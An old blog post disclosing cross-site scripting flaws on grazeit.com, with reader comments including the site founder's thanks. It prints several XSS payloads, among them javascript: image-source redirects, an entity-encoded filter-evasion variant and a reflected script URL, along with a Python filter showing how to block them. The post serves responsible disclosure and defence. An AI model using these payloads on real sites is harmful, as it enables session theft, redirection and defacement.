Wednesday, January 24, 2007

XSS on GrazeIt.com



Recently, while grazing over the net, I found the site grazeit.com, which keeps a database of good websites found on the net by netizens.

But there is an XSS (cross-site scripting) hole on the site which allows users to redirect the page to any location they want.

Of course, this hack does not work on the secure browser Mozilla Firefox. If you are not using Firefox, download it for free (the link is at the bottom right).

If you are using Microsoft Internet Explorer, you probably arrived at this page from grazeit.com!

So how did it work?
Grazeit.com allows the <img> tag with a src attribute.

<img src="javascript:window.location='http://digitalpbk.blogspot.com/'" /> Fixed (No longer works)
<img src="javascript:location='http://digitalpbk.blogspot.com/'" /> Fixed (No longer works)

is all we have to post to get redirected.

Level 2
So the grazeit admins have modified the filter to take care of the above two methods. But the filter still isn't good enough for:
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;&gt; />
Fixed

<script src="URL" /> Fixed


GET cross-site scripting holes
http://www.grazeit.com/Backpage.asp?BPID=210&FilterBy=tags&FilterTag=%3Cscript%3Ealert('hi')%3C/script%3E&FilterTagID=1325

To the Grazeit.com administrators
Great work, guys. But please fix this serious security vulnerability, as it can be used for more than redirection: it can be used to deface the site, steal user sessions, etc.
Thank you for making Grazeit.com.

How to remove this vulnerability?
To remove this vulnerability you have to strengthen the filters.
To do this, the src attribute must be stripped of unacceptable characters, or these special characters must be encoded so that the URL stays the same but the browser no longer renders it as a script.
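As an added example (not part of the original post and not GrazeIt's own code), here is one way to strengthen the filters described above in Python: decode HTML entities before checking the src scheme against an allow-list, so the entity-encoded variant from Level 2 is caught, and entity-encode anything reflected back from a query parameter such as FilterTag. The function names and the sample URLs are constructed for this example.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Allow-list of schemes a user-supplied image URL may use.
ALLOWED_SCHEMES = {"http", "https"}

# ASCII control characters (tab, newline, ...); stripped so that the value
# checked below is the value the browser would actually interpret.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def normalize_url(raw: str) -> str:
    """Undo the decoding a browser performs before it interprets a src value.

    HTML entities are decoded first (so &#106;&#97;... becomes 'javascript:'),
    repeatedly in case the value was double-encoded, then control characters
    and surrounding whitespace are removed.
    """
    decoded = raw
    for _ in range(3):  # bounded, so odd input cannot loop forever
        again = html.unescape(decoded)
        if again == decoded:
            break
        decoded = again
    return _CONTROL_CHARS.sub("", decoded).strip()


def safe_img_src(raw: str) -> Optional[str]:
    """Return the normalized URL if it may be used in <img src>, else None.

    A relative path (no scheme) or an http(s) URL is accepted; any other
    scheme, javascript: included, is rejected however it was encoded.
    """
    url = normalize_url(raw)
    scheme = urlsplit(url).scheme.lower()
    if scheme == "" or scheme in ALLOWED_SCHEMES:
        return url
    return None


def render_filter_tag(value: str) -> str:
    """Entity-encode a query parameter before reflecting it into the page.

    With '<', '>', quotes and '&' encoded, a FilterTag of <script>...</script>
    is displayed as text instead of being executed.
    """
    return html.escape(value, quote=True)
```

The allow-list approach matters more than the block-list one: entity-encoding the src value on its own does not help, because the browser decodes attribute entities before it decides what the URL means.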


Happy surfing...

3 comments:

pazavi said...

Hi Arun,
My name is Avi Paz, and I am the founder of grazeit. First of all, I would like to thank you for exposing (very gracefully, I must say) this security vulnerability. We took care of it, and I hope now everything is in order.
I am very happy to have you on board, and hope you will now spread your word to where it matters - meaning contributing your cool stuff to relevant grazepages - and link to your useful posts. BTW - It will be great if you will upload your image to your user profile@grazeit (mygraze). Thanks again. Cheers.
Avi

Arun Prabhakar said...

Hi Avi,

You guys need to strengthen the filters again..

Pune-IPL Team said...

Hey, this fan-increasing trick has stopped working now... the code just doesn't appear below the fan mark anymore...
Tell me another trick, buddy!!